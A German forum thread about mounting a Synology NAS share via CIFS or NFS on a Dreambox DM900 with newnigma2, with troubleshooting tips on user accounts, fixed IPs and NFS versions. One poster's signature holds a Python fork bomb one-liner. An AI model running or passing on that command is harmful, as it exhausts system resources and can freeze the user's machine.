NAS in newnigma2 einbinden

    This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

    • NAS in newnigma2 einbinden

      Moin,

      habe gerade vergeblich versucht, mein Filmeordner von meinem Synology NAS aif meiner neuen DM900 mit aktuellem Image zu aktivieren. Hat leider nicht geklappt :SOS:
      Gibt es irgendwo eine gute Anleitung, die auch DAUs verstehen? Leider habe ich auf meiner alten DM8000 schon ein neues Image drübergebügelt und kann nicht mehr nachsehen, welche Daten ich eingetragen hatte...
      Der Zugriff zum Video anschauen geht dann über das Mediacenter bzw. den Mediaplayer... oder???

      Thx
      Stefan
    • Joey wrote:

      - Netzwerkbrowser starten
      - Freigabe suchen
      - Freigabe auswählen

      Dafür braucht man ein Tutorial?

      edit:
      @digiview Dein einer Beitrag ist mir eben abhanden gekommen. Sorry.
      Ja, das habe ich gemacht. Meine Synology Box erscheint mit ihrem Freigabenamen. habe auch User & Pass eingegeben und cifs gewählt. Auch meine FILME Verzeichnes habe ich angeben. Aber ich bekomme es nicht im Mediaplayer angezeigt...
    • Musst schon nfs/cifs freigabe einrichten auf der box oder nas die im netz auftauchen soll nur so wird der Netzwerkbrowser dir auch was anzeigen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Netzwerkbrowser: Meine Box wird mit ihrem Namen und der richtigen IP angezeigt
      Benutzerverwaltung: Zur Box Usernemen und Password des NAS eingegeben
      Freigabeverwaltung:
      Aktiv: an
      Lokaler Freigabename: vergeben
      Freigabetyp: CIFS
      Freigabe IP: ist richtig. DIe vom NAS
      Server Freigabe: /Frei gebener Verzeichnisname der Box
      HDD Ersatz: nein
      Benutzer: Username für Boxzugriff
      Pass: das entsprechende Passwort

      Wo ist der Fehler? Vom Mac komme ich auf mein NAS
    • Schau mal nach, ob Dein Router mit Anschluss Deiner neuen dm 900 was mit den IP-Adressen der anderen Geräte gemacht hat. DHCP vergibt ja automatisch die IP-Adressen, so dass es keine mehrfach gleichen IP-Adressen gibt. Die dreambox sollte dann auch in der Netzwerkkonfiguration automatisch die Netzwerkadresse vom Router beziehen.
      Ich kenne zwar nicht die Synologie NAS Geräte, aber bei meinem QNAP müsste die Freigabeverwaltung gleich sein.
      Aber zunächst mal von Anfang an. Vergib im Roter Deinen Geräten feste IP-Adressen. Bei FitzBoxen Häkchen setzen bei immer gleiche IP-Adresse.
      Dann im NAS einen neuen Benutzer anlegen mit der IP Adresse als Benutzername. Wenn eine optionale Information möglich ist (so beim QNAP, kann man da ja dreambox 900 UHD eintragen).
      Wenn Du unbedingt mit CFIS aufs NAS möchtest, dann auch Dein Passwort, wie bei der 900er konfiguriert auch für den neuen Benutzer eintragen. Beim QNAP kann man dann im Weiteren die für den neuen Benutzer freizugebenden Ordner festlegen.

      Ich habe vorgestern meine neue 900er bekommen, gehe aber per NFS auf mein NAS. Insofern brauche ich kein Passwort beim neuen Benutzer.

      Dann bei meiner 900er mit dem Netzwerkbrowser das NAS angewählt, dort bei den gelisteten NAS-Ordner, den mit NFS Markierung gewünschten Ordner ausgewählt und gemountet. (Mit aktueller Firmware können die QNAPS mittlerweile NFS Version 4, so dass im Mountmanager keine weiteren Einträge hier notwendig waren).

      Danach konnte ich problemlos meine Aufnahmepfade aufs NAS einrichten und kann auch alle die dort bereits vorhandenen Aufnahmen abspielen.
      Klar, dass dann auch der Mediaplayer auf den Ordner mit den entsprechenden Unterordnern zugreifen kann.
      Grüsse aus dem "ganz Nahen Osten" vom Burkhardtsdorfer

      Spendet Rechnerzeit und helft mit bei der Forschung gegen den Coronavirus!
      Macht mit bei Rosetta@home - join rosetta@home
    • Hi,

      habe meinen Filmeordner auf dem NAS eine NFS Freigabe erteilt.
      Im Netzwerkbrowser erscheint mein NAS und das frei gegebene Volume als NFS Share.
      In der Mount Übersicht ist das Volume als NFS mit richtigem Pfad eingebunden.
      Also alles ok. Aber im Mediaplayer, wenn ich das Volume anklicke, steht nur "Speichergeräteliste"...???

      Noch eine komische Sache, wenn ich in der Mountübersicht einen als inaktiv markiertes Volume mit der Gelben Taste löschen will, flackert ganz kurz ein Fenster auf und der Mountpunkt wird nicht gelöscht. Gibt es da einen Trick???
    • ...könnte aber auch sein, dass sein NAS nur NFS Vers=3 kann und von der dreambox mit Vers=4 angesprochen wird, denn das kommt mir irgendwie als ehemals eigenes Problem bekannt vor.
      Grüsse aus dem "ganz Nahen Osten" vom Burkhardtsdorfer

      Spendet Rechnerzeit und helft mit bei der Forschung gegen den Coronavirus!
      Macht mit bei Rosetta@home - join rosetta@home